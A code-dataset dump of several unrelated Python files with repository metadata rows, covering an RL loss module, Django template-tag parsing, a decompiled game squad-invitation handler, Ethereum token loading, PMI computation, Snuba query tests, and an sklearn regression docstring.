# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements a generalized onpolicy loss."""
import abc
import inspect
import gin
from seed_rl.agents.policy_gradient.modules import logging_module
import tensorflow as tf
@gin.configurable
class GeneralizedOnPolicyLoss(tf.Module, logging_module.LoggingModule):
"""TensorFlow module implementing the generalized onpolicy loss."""
def __init__(self, agent, reward_normalizer, parametric_action_distribution,
advantage_estimator, policy_loss, discount_factor,
regularizer=None, max_abs_reward=None,
handle_abandoned_episodes_properly=True,
huber_delta=None, value_ppo_style_clip_eps=None,
baseline_cost=1., include_regularization_in_returns=False,
frame_skip=1, reward_scaling=1.0):
"""Creates a GeneralizedOnPolicyLoss."""
self._agent = agent
self._reward_normalizer = reward_normalizer
self._parametric_action_distribution = parametric_action_distribution
self._advantage_estimator = advantage_estimator
self._policy_loss = policy_loss
self._regularizer = regularizer
self._max_abs_reward = max_abs_reward
self._reward_scaling = reward_scaling
self._baseline_cost = baseline_cost
# Provided here so that it is shared.
self._discount_factor = discount_factor
self._frame_skip = frame_skip
self._handle_abandoned_episodes_properly = handle_abandoned_episodes_properly
self._value_ppo_style_clip_eps = value_ppo_style_clip_eps
self._include_regularization_in_returns = include_regularization_in_returns
if huber_delta is not None:
self.v_loss_fn = tf.keras.losses.Huber(
delta=huber_delta, reduction=tf.keras.losses.Reduction.NONE)
else:
self.v_loss_fn = tf.keras.losses.MeanSquaredError(
reduction=tf.keras.losses.Reduction.NONE)
def init(self):
for module in self.submodules:
if hasattr(module, 'init'):
if not inspect.signature(module.init).parameters:
module.init()
def compute_advantages(self, agent_state, prev_actions, env_outputs,
agent_outputs, return_learner_outputs=False):
# Extract rewards and done information.
rewards, done, _, abandoned, _ = tf.nest.map_structure(lambda t: t[1:],
env_outputs)
if self._max_abs_reward is not None:
rewards = tf.clip_by_value(rewards, -self._max_abs_reward,
self._max_abs_reward)
rewards *= self._reward_scaling
# Compute the outputs of the neural networks on the learner.
learner_outputs, _ = self._agent((prev_actions, env_outputs),
agent_state,
unroll=True,
is_training=True)
# At this point, we have unroll length + 1 steps. The last step is only used
# as bootstrap value, so it's removed.
agent_outputs = tf.nest.map_structure(lambda t: t[:-1], agent_outputs)
learner_v = learner_outputs.baseline # current value function
learner_outputs = tf.nest.map_structure(lambda t: t[:-1], learner_outputs)
target_action_log_probs = self._parametric_action_distribution(
learner_outputs.policy_logits).log_prob(agent_outputs.action)
behaviour_action_log_probs = self._parametric_action_distribution(
agent_outputs.policy_logits).log_prob(agent_outputs.action)
# Compute the advantages.
if self._reward_normalizer:
corrected_predictions = self._reward_normalizer.correct_prediction(
learner_v)
unnormalized_predictions = self._reward_normalizer.unnormalize_prediction(
corrected_predictions)
else:
corrected_predictions = learner_v
unnormalized_predictions = learner_v
if not self._handle_abandoned_episodes_properly:
abandoned = tf.zeros_like(abandoned)
done_terminated = tf.logical_and(done, ~abandoned)
done_abandoned = tf.logical_and(done, abandoned)
if self._include_regularization_in_returns and self._regularizer:
additional_rewards, _ = self._regularizer(
self._parametric_action_distribution,
learner_outputs.policy_logits,
agent_outputs.policy_logits,
agent_outputs.action, with_logging=False)
assert rewards.shape == additional_rewards.shape
rewards += additional_rewards
# tf.math.pow does not work on TPU so we compute it manually.
adjusted_discount_factor = 1.
for _ in range(self._frame_skip):
adjusted_discount_factor *= self._discount_factor
vs, advantages = self._advantage_estimator(
unnormalized_predictions,
rewards, done_terminated,
done_abandoned,
adjusted_discount_factor,
target_action_log_probs,
behaviour_action_log_probs)
if self._reward_normalizer:
normalized_targets = self._reward_normalizer.normalize_target(vs)
normalized_advantages = self._reward_normalizer.normalize_advantage(
advantages)
self._reward_normalizer.update_normalization_statistics(vs)
else:
normalized_targets = vs
normalized_advantages = advantages
outputs = (normalized_targets, normalized_advantages)
if return_learner_outputs:
outputs += (learner_outputs,)
return outputs
def __call__(self, agent_state, prev_actions, env_outputs, agent_outputs,
normalized_targets=None, normalized_advantages=None):
"""Computes the loss."""
if normalized_targets is None:
normalized_targets, normalized_advantages, learner_outputs = \
self.compute_advantages(
agent_state, prev_actions, env_outputs, agent_outputs,
return_learner_outputs=True)
# The last timestep is only used for computing advantages so we
# remove it here.
agent_state, prev_actions, env_outputs, agent_outputs = \
tf.nest.map_structure(
lambda t: t[:-1],
(agent_state, prev_actions, env_outputs, agent_outputs))
else: # Advantages are already precomputed.
learner_outputs, _ = self._agent((prev_actions, env_outputs),
agent_state,
unroll=True,
is_training=True)
target_action_log_probs = self._parametric_action_distribution(
learner_outputs.policy_logits).log_prob(agent_outputs.action)
behaviour_action_log_probs = self._parametric_action_distribution(
agent_outputs.policy_logits).log_prob(agent_outputs.action)
# Compute the advantages.
if self._reward_normalizer:
corrected_predictions = self._reward_normalizer.correct_prediction(
learner_outputs.baseline)
old_corrected_predictions = self._reward_normalizer.correct_prediction(
agent_outputs.baseline)
else:
corrected_predictions = learner_outputs.baseline
old_corrected_predictions = agent_outputs.baseline
# Compute the advantage-based loss.
policy_loss = tf.reduce_mean(
self._policy_loss(
normalized_advantages,
target_action_log_probs,
behaviour_action_log_probs,
actions=agent_outputs.action,
target_logits=learner_outputs.policy_logits,
behaviour_logits=agent_outputs.policy_logits,
parametric_action_distribution=self._parametric_action_distribution)
)
# Value function loss
v_error = normalized_targets - corrected_predictions
self.log('GeneralizedOnPolicyLoss/V_error', v_error)
self.log('GeneralizedOnPolicyLoss/abs_V_error', tf.abs(v_error))
self.log('GeneralizedOnPolicyLoss/corrected_predictions',
corrected_predictions)
# Huber loss reduces the last dimension so we add a dummy one here.
normalized_targets = normalized_targets[..., tf.newaxis]
corrected_predictions = corrected_predictions[..., tf.newaxis]
v_loss = self.v_loss_fn(normalized_targets, corrected_predictions)
# PPO-style value loss clipping
if self._value_ppo_style_clip_eps is not None:
old_corrected_predictions = old_corrected_predictions[..., tf.newaxis]
clipped_corrected_predictions = tf.clip_by_value(
corrected_predictions,
old_corrected_predictions - self._value_ppo_style_clip_eps,
old_corrected_predictions + self._value_ppo_style_clip_eps)
clipped_v_loss = self.v_loss_fn(normalized_targets,
clipped_corrected_predictions)
v_loss = tf.maximum(v_loss, clipped_v_loss)
v_loss = tf.reduce_mean(v_loss)
# Compute the regularization loss.
if self._regularizer:
per_step_regularization, regularization_loss = self._regularizer(
self._parametric_action_distribution,
learner_outputs.policy_logits,
agent_outputs.policy_logits,
agent_outputs.action)
if not self._include_regularization_in_returns:
regularization_loss += tf.reduce_mean(per_step_regularization)
else:
regularization_loss = 0.
total_loss = policy_loss + self._baseline_cost*v_loss + regularization_loss
return total_loss
class PolicyLoss(tf.Module, metaclass=abc.ABCMeta):
"""Abstract base class for policy losses."""
@abc.abstractmethod
def __call__(self, advantages, target_action_log_probs,
behaviour_action_log_probs):
r"""Computes policy loss.
Args:
advantages: A float32 tensor of shape [T, B] of advantages.
target_action_log_probs: A float32 tensor of shape [T, B] with
log-probabilities of taking the action by the current policy
behaviour_action_log_probs: A float32 tensor of shape [T, B] with
log-probabilities of taking the action by the behavioural policy
Returns:
A float32 tensor of shape [T, B] with the policy loss.
"""
raise NotImplementedError('`__call__()` is not implemented!')
class RegularizationLoss(tf.Module, metaclass=abc.ABCMeta):
"""Abstract base class for policy losses."""
@abc.abstractmethod
def __call__(self, parametric_action_distribution, target_action_logits,
behaviour_action_logits, actions):
r"""Computes regularization loss.
Args:
parametric_action_distribution: Parametric action distribution.
target_action_logits: A float32 tensor of shape [T, B, A] with
the logits of the target policy.
behaviour_action_logits: A float32 tensor of shape [T, B, A] with
the logits of the behavioural policy.
actions: A float32 tensor of shape [T, B, A] with the actions taken by the
behaviour policy.
Returns:
A float32 tensor of shape [T, B] with the regularization loss.
"""
raise NotImplementedError('`__call__()` is not implemented!')
| [
"stanczyk@google.com"
] | stanczyk@google.com |
d7b781bab6353a104d0b726b33244a8255434f2b | d47cd584579452a8212a19ffee462f0c2e792a9c | /fluent_contents/utils/tagparsing.py | 0267274366501f593eb3eb2a955f356a98482d1c | [
"Apache-2.0"
] | permissive | kerin/django-fluent-contents | 9db6d397c3b5aeebc4691e3b8ad6f09fbbd50c41 | d760e7d1648f4583bdd8ba4c3078a3f5d9f544b4 | refs/heads/master | 2021-01-15T17:55:28.346869 | 2013-02-11T14:26:04 | 2013-02-11T14:26:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | from django.template.base import TemplateSyntaxError, Token
import re
kwarg_re = re.compile('^(?P<name>\w+)=')
def parse_token_kwargs(parser, token, compile_args=False, compile_kwargs=False, allowed_kwargs=None):
"""
Allow the template tag arguments to be like a normal Python function, with *args and **kwargs.
"""
if isinstance(token, Token):
bits = token.split_contents()
else:
bits = token
expect_kwarg = False
args = []
kwargs = {}
prev_bit = None
for bit in bits[1::]:
match = kwarg_re.match(bit)
if match:
expect_kwarg = True
(name, expr) = bit.split('=', 2)
kwargs[name] = parser.compile_filter(expr) if compile_args else expr
else:
if expect_kwarg:
raise TemplateSyntaxError("{0} tag may not have a non-keyword argument ({1}) after a keyword argument ({2}).".format(bits[0], bit, prev_bit))
args.append(parser.compile_filter(bit) if compile_kwargs else bit)
prev_bit = bit
# Validate the allowed arguments, to make things easier for template developers
if allowed_kwargs is not None:
for name in kwargs:
if name not in allowed_kwargs:
raise AttributeError("The option %s=... cannot be used in '%s'.\nPossible options are: %s." % (name, bits[0], ", ".join(allowed_kwargs)))
return args, kwargs
| [
"vdboor@edoburu.nl"
] | vdboor@edoburu.nl |
4df8edf8fd0b18807fd1e09544c4b2f48e36594d | ec0b8bfe19b03e9c3bb13d9cfa9bd328fb9ca3f1 | /res/packages/scripts/scripts/client/gui/battle_control/arena_info/invitations.py | b1b060087fc9dc86befe5e49b3490250cc218ed0 | [] | no_license | webiumsk/WOT-0.9.20.0 | de3d7441c5d442f085c47a89fa58a83f1cd783f2 | 811cb4e1bca271372a1d837a268b6e0e915368bc | refs/heads/master | 2021-01-20T22:11:45.505844 | 2017-08-29T20:11:38 | 2017-08-29T20:11:38 | 101,803,045 | 0 | 1 | null | null | null | null | WINDOWS-1250 | Python | false | false | 10,226 | py | # 2017.08.29 21:44:26 Střední Evropa (letní čas)
# Embedded file name: scripts/client/gui/battle_control/arena_info/invitations.py
import BattleReplay
from adisp import process
from constants import PREBATTLE_TYPE, INVITATION_TYPE
from gui.battle_control.arena_info.settings import INVITATION_DELIVERY_STATUS
from gui.battle_control.requests.context import SendInvitesCtx
from gui.prb_control import prbInvitesProperty
from ids_generators import SequenceIDGenerator
from skeletons.gui.battle_session import ISquadInvitationsHandler
from unit_roster_config import SquadRoster
_STATUS = INVITATION_DELIVERY_STATUS
_SEND_ACTION_NAME = 'DynSquad.SendInvitationToSquad'
_ACCEPT_ACTION_NAME = 'DynSquad.AcceptInvitationToSquad'
_REJECT_ACTION_NAME = 'DynSquad.RejectInvitationToSquad'
class SquadInvitationsFilter(object):
__slots__ = ('__arenaUniqueID', '__isReceivingProhibited', '__isSendingProhibited', '__received', '__sent')
def __init__(self):
super(SquadInvitationsFilter, self).__init__()
self.__arenaUniqueID = 0
self.__isReceivingProhibited = False
self.__isSendingProhibited = False
self.__received = {}
self.__sent = {}
def setArenaUniqueID(self, arenaUniqueID):
self.__arenaUniqueID = arenaUniqueID
def isReceivingProhibited(self):
return self.__isReceivingProhibited
def isSendingProhibited(self):
return self.__isSendingProhibited
def updatePersonalInfo(self, arenaDP):
vInfoVO = arenaDP.getVehicleInfo()
playerInfo = vInfoVO.player
self.__isReceivingProhibited = playerInfo.forbidInBattleInvitations
self.__isSendingProhibited = False
if vInfoVO.isInSquad():
if playerInfo.isPrebattleCreator:
count = arenaDP.getVehiclesCountInPrebattle(vInfoVO.team, vInfoVO.prebattleID)
self.__isSendingProhibited = count >= SquadRoster.MAX_SLOTS
else:
self.__isSendingProhibited = True
def addReceivedInvite(self, invite):
if invite is None:
return (0, _STATUS.NONE)
else:
self.__received[invite.creatorDBID] = invite.clientID
include = _STATUS.RECEIVED_FROM
if not self.__isInviteValid(invite):
include |= _STATUS.RECEIVED_INACTIVE
return (invite.creatorDBID, include)
def addSentInvite(self, invite):
if invite is None:
return (0, _STATUS.NONE)
else:
self.__sent[invite.receiverDBID] = invite.clientID
include = _STATUS.SENT_TO
if not self.__isInviteValid(invite):
include |= _STATUS.SENT_INACTIVE
return (invite.receiverDBID, include)
def filterReceivedInvites(self, getter, added, changed, deleted):
"""Filters received invites.
It's generator that returns item containing tuple(accountDBID, include, exclude).
:param getter: function to get invite data.
:param added: list of invites IDs that are added.
:param changed: list of invites IDs that are changed.
:param deleted: list of invites IDs that are deleted.
"""
for clientID in added:
invite = getter(clientID)
if invite is None:
continue
if not self.__isInviteValid(invite):
continue
self.__received[invite.creatorDBID] = invite.clientID
yield (invite.creatorDBID, _STATUS.RECEIVED_FROM, _STATUS.RECEIVED_INACTIVE)
for clientID in changed:
invite = getter(clientID)
if invite is None:
continue
if self.__isInviteValid(invite):
yield (invite.creatorDBID, _STATUS.RECEIVED_FROM, _STATUS.RECEIVED_INACTIVE)
else:
yield (invite.creatorDBID, _STATUS.RECEIVED_INACTIVE, _STATUS.NONE)
inverted = dict(zip(self.__received.values(), self.__received.keys()))
for clientID in deleted:
if clientID not in inverted:
continue
accountDBID = inverted[clientID]
if self.__received.pop(accountDBID, None) is not None:
yield (accountDBID, _STATUS.NONE, _STATUS.RECEIVED_FROM | _STATUS.RECEIVED_INACTIVE)
return
def filterSentInvites(self, getter, added, changed, deleted):
"""Filters sent invites.
It's generator that returns item containing tuple(accountDBID, include, exclude).
:param getter: function to get invite data.
:param added: list of invites IDs that are added.
:param changed: list of invites IDs that are changed.
:param deleted: list of invites IDs that are deleted.
"""
for clientID in added:
invite = getter(clientID)
if invite is None:
continue
if not self.__isInviteValid(invite):
continue
self.__sent[invite.receiverDBID] = invite.clientID
yield (invite.receiverDBID, _STATUS.SENT_TO, _STATUS.SENT_INACTIVE)
for clientID in changed:
invite = getter(clientID)
if invite is None:
continue
if self.__isInviteValid(invite):
yield (invite.receiverDBID, _STATUS.SENT_TO, _STATUS.SENT_INACTIVE)
else:
yield (invite.receiverDBID, _STATUS.SENT_INACTIVE, _STATUS.NONE)
inverted = dict(zip(self.__sent.values(), self.__sent.keys()))
for clientID in deleted:
if clientID not in inverted:
continue
accountDBID = inverted[clientID]
if self.__sent.pop(accountDBID, None) is not None:
yield (accountDBID, _STATUS.NONE, _STATUS.SENT_TO | _STATUS.SENT_INACTIVE)
return
def __isInviteValid(self, invite):
if invite.type != PREBATTLE_TYPE.SQUAD:
return False
if not invite.isSameBattle(self.__arenaUniqueID):
return False
if not invite.isActive():
return False
return True
class _SquadInvitationsHandler(ISquadInvitationsHandler):
__slots__ = ('__sessionProvider',)
def __init__(self, setup):
super(_SquadInvitationsHandler, self).__init__()
self.__sessionProvider = setup.sessionProvider
@prbInvitesProperty
def prbInvites(self):
return None
def clear(self):
self.__sessionProvider = None
return
def send(self, playerID):
self.__onSendInviteToSquad(playerID)
def accept(self, playerID):
inviteID = self.__getInviteID(playerID, True, True)
if inviteID is not None:
self.prbInvites.acceptInvite(inviteID)
return
def reject(self, playerID):
inviteID = self.__getInviteID(playerID, True, True)
if inviteID is not None:
self.prbInvites.declineInvite(inviteID)
return
@process
def __onSendInviteToSquad(self, playerID):
yield self.__sessionProvider.sendRequest(SendInvitesCtx(databaseIDs=(playerID,)))
def __getInviteID(self, playerID, isCreator, incomingInvites):
invites = self.prbInvites.getInvites(incoming=incomingInvites, onlyActive=True)
if isCreator:
def getter(item):
return item.creatorDBID
else:
def getter(item):
return item.receiverDBID
for invite in invites:
if invite.type == INVITATION_TYPE.SQUAD and getter(invite) == playerID:
return invite.clientID
return None
class _SquadInvitationsRecorder(_SquadInvitationsHandler):
""" This class wraps _SquadInvitationsHandler in order to record player's
actions with dyn squads during replay recording."""
__slots__ = ('__idGen',)
def __init__(self, setup):
super(_SquadInvitationsRecorder, self).__init__(setup)
self.__idGen = SequenceIDGenerator()
def send(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_SEND_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).send(playerID)
def accept(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_ACCEPT_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).accept(playerID)
def reject(self, playerID):
BattleReplay.g_replayCtrl.serializeCallbackData(_REJECT_ACTION_NAME, (self.__idGen.next(), playerID))
super(_SquadInvitationsRecorder, self).reject(playerID)
class _SquadInvitationsPlayer(_SquadInvitationsHandler):
""" This class wraps _SquadInvitationsHandler in order to simulate player's
actions with dyn squads during replay."""
__slots__ = ()
def __init__(self, setup):
super(_SquadInvitationsPlayer, self).__init__(setup)
setCallback = BattleReplay.g_replayCtrl.setDataCallback
for action, method in [(_SEND_ACTION_NAME, self.__onSend), (_ACCEPT_ACTION_NAME, self.__onAccept), (_REJECT_ACTION_NAME, self.__onReject)]:
setCallback(action, method)
def clear(self):
delCallback = BattleReplay.g_replayCtrl.delDataCallback
for eventName, method in [(_SEND_ACTION_NAME, self.__onSend), (_ACCEPT_ACTION_NAME, self.__onAccept), (_REJECT_ACTION_NAME, self.__onReject)]:
delCallback(eventName, method)
super(_SquadInvitationsPlayer, self).clear()
def __onSend(self, _, playerID):
self.send(playerID)
def __onAccept(self, _, playerID):
self.accept(playerID)
def __onReject(self, _, playerID):
self.reject(playerID)
def createInvitationsHandler(setup):
if setup.isReplayPlaying:
handler = _SquadInvitationsPlayer(setup)
elif setup.isReplayRecording:
handler = _SquadInvitationsRecorder(setup)
else:
handler = _SquadInvitationsHandler(setup)
return handler
# okay decompyling c:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\battle_control\arena_info\invitations.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.08.29 21:44:27 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
c0048d8b6c66c64ca5af65eba38528e645253d6b | a7625f86f3cc944b56f2862fad83e758d259baf9 | /chapter5/q20.py | 980149e8ec494ac30e3a62d6aa4ace021074f761 | [] | no_license | luke-mao/Data-Structures-and-Algorithms-in-Python | a517a2a87136002475489ee4c2924073daab4508 | a60ea0ccaa85bf4ca288736b3a55d5396213a408 | refs/heads/master | 2022-08-28T18:51:33.515450 | 2020-05-27T04:46:06 | 2020-05-27T04:46:06 | 264,062,695 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,487 | py | """
test 4 different methods to construct a long string
"""
import time
def method1(n):
letters = ""
for _ in range(n):
letters += "a"
return letters
def method2(n):
temp = []
for _ in range(n):
temp.append("a")
return "".join(temp)
def method3(n):
return "".join(["a" for _ in range(n)])
def method4(n):
return "".join("a" for _ in range(n))
if __name__ == '__main__':
n_list = [10**4, 10**5, 10**6, 10**7]
m1 = [None] * len(n_list)
m2 = [None] * len(n_list)
m3 = [None] * len(n_list)
m4 = [None] * len(n_list)
for i in range(len(n_list)):
a = time.time()
result = method1(n_list[i])
b = time.time()
del result
m1[i] = int((b-a)*10**6)
for i in range(len(n_list)):
a = time.time()
result = method2(n_list[i])
b = time.time()
del result
m2[i] = int((b-a)*10**6)
for i in range(len(n_list)):
a = time.time()
result = method3(n_list[i])
b = time.time()
del result
m3[i] = int((b-a)*10**6)
for i in range(len(n_list)):
a = time.time()
result = method4(n_list[i])
b = time.time()
del result
m4[i] = int((b-a)*10**6)
print(m1)
print(m2)
print(m3)
print(m4)
"""
the string append method is difinitely worse than the others.
for the others, the time does not varies a lot, seems to finish all in O(n)
""" | [
"55699548+luke-mao@users.noreply.github.com"
] | 55699548+luke-mao@users.noreply.github.com |
601dc711804496f547111d1d953946085dd3b498 | e07da133c4efa517e716af2bdf67a46f88a65b42 | /hub20/apps/ethereum_money/management/commands/load_tracked_tokens.py | 5701e391f3f536030bd13c896353e2c518edd93a | [
"MIT"
] | permissive | cryptobuks1/hub20 | be1da5f77a884f70068fd41edaa45d5e65b7c35e | 3a4d9cf16ed9d91495ac1a28c464ffb05e9f837b | refs/heads/master | 2022-04-19T21:26:15.386567 | 2020-04-19T07:17:47 | 2020-04-19T07:17:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py | import logging
from django.core.management.base import BaseCommand
from eth_utils import to_checksum_address
from hub20.apps.ethereum_money.app_settings import TRACKED_TOKENS
from hub20.apps.ethereum_money.models import EthereumToken
logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "Loads data relevant to all tokens that are going to be used by the instance"
def handle(self, *args, **options):
for token_address in TRACKED_TOKENS:
logger.info(f"Checking token {token_address}...")
try:
EthereumToken.make(to_checksum_address(token_address))
except OverflowError:
logger.error(f"{token_address} is not a valid address or not ERC20-compliant")
except Exception as exc:
logger.exception(f"Failed to load token data for {token_address}", exc_info=exc)
| [
"raphael@lullis.net"
] | raphael@lullis.net |
790e5e58745705e85b5e870e38166ed8d9fd690c | b1a38b9a4ede490f0c680ba5f7ee2eb9f689f35a | /assignment-2/best_friends.py | efbd7631751cf43e661feb33a34ac4cf46936a22 | [] | no_license | jencmart/mff-nlp1-npfl124 | e6e2836d57f40a5afe260694b422dfe5645e89bc | be913089f95fd9799c7576a2bc9c26f6a235d255 | refs/heads/master | 2023-03-12T11:14:01.930363 | 2021-03-06T10:31:03 | 2021-03-06T10:31:03 | 306,836,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,712 | py | import errno
import os
import numpy as np
from utils import *
def compute_counts(dataset, min_dist=1, max_dist=1, reverse=False): # 2 51
bigram_count_dict = CountDict()
unigram_count_dict = CountDict()
max_index = len(dataset) - 1
for idx, first_word in enumerate(dataset):
unigram_count_dict.insert(first_word)
start_pos = min(max_index, idx + min_dist)
end_pos = min(max_index, idx + max_dist + 1) # +1 because we want 'max_dist' inclusive
for next_idx in range(start_pos, end_pos):
second_word = dataset[next_idx]
key = first_word + " " + second_word
bigram_count_dict.insert(key)
if reverse:
start_pos = max(0, idx - min_dist + 1)
end_pos = max(0, idx - max_dist) # +1 because we want 'max_dist' inclusive
for next_idx in range(end_pos, start_pos):
second_word = dataset[next_idx]
key = first_word + " " + second_word
bigram_count_dict.insert(key)
bigram_freq = bigram_count_dict.get_frequencies(len(dataset))
unigram_freq = unigram_count_dict.get_frequencies(len(dataset), limit=10)
return bigram_freq, unigram_freq
def compute_pointwise_mu(e, data, reverse=False):
joint_probs, single_probs = compute_counts(data, min_dist=e["min_dist"], max_dist=e["max_dist"], reverse=reverse)
result = {}
for key_joint, p_joint in joint_probs.items():
x1, x2 = key_joint.split(" ")
p_x1 = single_probs[x1]
p_x2 = single_probs[x2]
if p_x1 is not None and p_x2 is not None:
result[key_joint] = np.log2(p_joint / (p_x1 * p_x2))
result = [(k, v) for k, v in sorted(result.items(), key=lambda item: item[1], reverse=True)]
return result
def save_result(res, fname, max_lines=20):
# Save Results (create directory if not exist)
if not os.path.exists(os.path.dirname(fname)):
try:
os.makedirs(os.path.dirname(fname))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
with open(fname, "w") as f:
f.write("x1,x2,pmu\n")
for x1x2, v in res:
max_lines -= 1
x1, x2 = x1x2.split(" ")
f.write(x1 + "," + x2 + "," + str(v) + "\n")
if max_lines == 0:
break
if __name__ == "__main__":
# DATASETS
dataset_dir = "dataset"
datasets = {"cz": "TEXTCZ1.txt", "en": "TEXTEN1.txt"}
# >>> encode CZ dataset to UTF >>>
path = os.path.join(dataset_dir, datasets["cz"] + "-utf")
if not os.path.isfile(path):
encode_as_utf(os.path.join(dataset_dir, datasets["cz"]))
datasets["cz"] = datasets["cz"] + "-utf"
# <<< encode CZ dataset to UTF <<<
# ... On each dataset ...
experiments = [
{"name": "close", "min_dist": 1, "max_dist": 1, "backward": False},
{"name": "far", "min_dist": 1+1, "max_dist": 50+1, "backward": True},
]
for experiment in experiments:
for lang, fname in datasets.items():
print("Dataset: {}".format(fname))
dataset, _, _ = load_dataset(os.path.join(dataset_dir, fname))
result = compute_pointwise_mu(experiment, dataset, reverse=False)
filename = "friend_results/"+"best_friends_"+lang+"_"+experiment["name"]+".csv"
save_result(result, filename)
if experiment["backward"]:
result = compute_pointwise_mu(experiment, dataset, reverse=True)
filename = "friend_results/" + "best_friends_" + lang + "_" + experiment["name"] + "_reversed" + ".csv"
save_result(result, filename)
| [
"martin.jenc@getmanta.com"
] | martin.jenc@getmanta.com |
6ef6540bd2180186c923cbd1e76bfd2414db3f1d | ec6b94f8fa4558f2156f5cdf1ab0347fb5573241 | /tests/clickhouse/query_dsl/test_project_id.py | ce274c9a8930b4499e68fc3e9dba3946378cca79 | [
"Apache-2.0",
"BUSL-1.1"
] | permissive | pombredanne/snuba | 8e9a55bf38b3ac84407d0c2755e3c0ac226688de | eb1d25bc52320bf57a40fd6efc3da3dd5e9f1612 | refs/heads/master | 2021-08-27T20:55:46.392979 | 2021-08-14T08:21:47 | 2021-08-14T08:21:47 | 171,631,594 | 0 | 0 | Apache-2.0 | 2020-01-10T10:42:17 | 2019-02-20T08:26:17 | Python | UTF-8 | Python | false | false | 4,583 | py | from typing import Any, MutableMapping, Set
import pytest
from snuba.clickhouse.query_dsl.accessors import get_object_ids_in_query_ast
from snuba.datasets.factory import get_dataset
from snuba.datasets.plans.translator.query import identity_translate
from snuba.query.parser import parse_query
test_cases = [
(
{"selected_columns": ["column1"], "conditions": [["project_id", "=", 100]]},
{100},
), # Simple single project condition
(
{
"selected_columns": ["column1"],
"conditions": [["project_id", "IN", [100, 200, 300]]],
},
{100, 200, 300},
), # Multiple projects in the query
(
{
"selected_columns": ["column1"],
"conditions": [["project_id", "IN", (100, 200, 300)]],
},
{100, 200, 300},
), # Multiple projects in the query provided as tuple
(
{"selected_columns": ["column1"], "conditions": []},
None,
), # No project condition
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
["project_id", "IN", [300, 400, 500]],
],
},
{300},
), # Multiple project conditions, intersected together
(
{
"selected_columns": ["column1"],
"conditions": [
[
["project_id", "IN", [100, 200, 300]],
["project_id", "IN", [300, 400, 500]],
]
],
},
{100, 200, 300, 400, 500},
), # Multiple project conditions, in union
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
["project_id", "=", 400],
],
},
set(),
), # A fairly stupid query
(
{
"selected_columns": ["column1"],
"conditions": [
["column1", "=", "something"],
[["ifNull", ["column2", 0]], "=", 1],
["project_id", "IN", [100, 200, 300]],
[("count", ["column3"]), "=", 10],
["project_id", "=", 100],
],
},
{100},
), # Multiple conditions in AND. Two project conditions
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
[["project_id", "=", 100], ["project_id", "=", 200]],
],
},
{100, 200},
), # Main project list in a conditions and multiple project conditions in OR
(
{
"selected_columns": ["column1"],
"conditions": [
["project_id", "IN", [100, 200, 300]],
[
[["ifNull", ["project_id", 1000]], "=", 100],
[("count", ["column3"]), "=", 10],
[["ifNull", ["project_id", 1000]], "=", 200],
],
],
},
{100, 200, 300},
), # Main project list in a conditions and multiple project conditions within unsupported function calls
(
{
"selected_columns": ["column1"],
"conditions": [
[
[
"and",
[
["equals", ["project_id", 100]],
["equals", ["column1", "'something'"]],
],
],
"=",
1,
],
[
[
"and",
[
["equals", ["project_id", 200]],
["equals", ["column3", "'something_else'"]],
],
],
"=",
1,
],
],
},
None,
), # project_id in unsupported functions (cannot navigate into an "and" function)
# TODO: make this work as it should through the AST.
]
@pytest.mark.parametrize("query_body, expected_projects", test_cases)
def test_find_projects(
query_body: MutableMapping[str, Any], expected_projects: Set[int]
) -> None:
events = get_dataset("events")
query = identity_translate(parse_query(query_body, events))
project_ids_ast = get_object_ids_in_query_ast(query, "project_id")
assert project_ids_ast == expected_projects
| [
"noreply@github.com"
] | noreply@github.com |
fee6c4374d7d6e9eceaa09cf64c3bf93594efe6c | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/9960b43c9cc1e2a2e58da7952283f93d09a1fdc0-<f_regression>-bug.py | 1f2d5280f165e64d4a762027a36feb370bb04cf1 | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,406 | py |
def f_regression(X, y, center=True):
'Univariate linear regression tests.\n\n Linear model for testing the individual effect of each of many regressors.\n This is a scoring function to be used in a feature seletion procedure, not\n a free standing feature selection procedure.\n\n This is done in 2 steps:\n\n 1. The correlation between each regressor and the target is computed,\n that is, ((X[:, i] - mean(X[:, i])) * (y - mean_y)) / (std(X[:, i]) *\n std(y)).\n 2. It is converted to an F score then to a p-value.\n\n For more on usage see the :ref:`User Guide <univariate_feature_selection>`.\n\n Parameters\n ----------\n X : {array-like, sparse matrix} shape = (n_samples, n_features)\n The set of regressors that will be tested sequentially.\n\n y : array of shape(n_samples).\n The data matrix\n\n center : True, bool,\n If true, X and y will be centered.\n\n Returns\n -------\n F : array, shape=(n_features,)\n F values of features.\n\n pval : array, shape=(n_features,)\n p-values of F-scores.\n\n\n See also\n --------\n mutual_info_regression: Mutual information for a continuous target.\n f_classif: ANOVA F-value between label/feature for classification tasks.\n chi2: Chi-squared stats of non-negative features for classification tasks.\n SelectKBest: Select features based on the k highest scores.\n SelectFpr: Select features based on a false positive rate test.\n SelectFdr: Select features based on an estimated false discovery rate.\n 